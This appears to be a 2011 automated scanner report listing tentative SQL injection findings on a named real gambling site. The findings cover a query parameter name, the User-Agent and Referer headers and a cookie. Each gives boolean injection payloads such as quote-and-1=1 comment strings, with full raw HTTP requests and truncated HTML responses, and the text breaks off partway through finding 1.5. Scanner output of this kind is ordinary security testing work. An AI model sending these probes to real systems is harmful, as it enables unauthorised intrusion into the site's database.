The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Casino/Disco-Keno?1%20and%201%3d1--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" oncli
...[SNIP]...

Request 2

GET /en/Casino/Disco-Keno?1%20and%201%3d2--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Sports/Goal-Kick">Calling all football fans...Goal Kick - ..200,000 Jackpot!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" onclick="Toggle
...[SNIP]...

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Lost-Maya

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" oncl
...[SNIP]...

Request 2

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGa
...[SNIP]...

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fantasia

Issue detail

The site cookie appears to be vulnerable to SQL injection attacks. The payloads 52785076'%20or%201%3d1--%20 and 52785076'%20or%201%3d2--%20 were each submitted in the site cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d1--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:03 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

Request 2

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d2--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:05 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino','Sl
...[SNIP]...

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/Bowling

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17123380'%20or%201%3d1--%20 and 17123380'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:10 GMT
Connection: close
Content-Length: 102693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino
...[SNIP]...

Request 2

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:12 GMT
Connection: close
Content-Length: 102706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/World-Champions

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
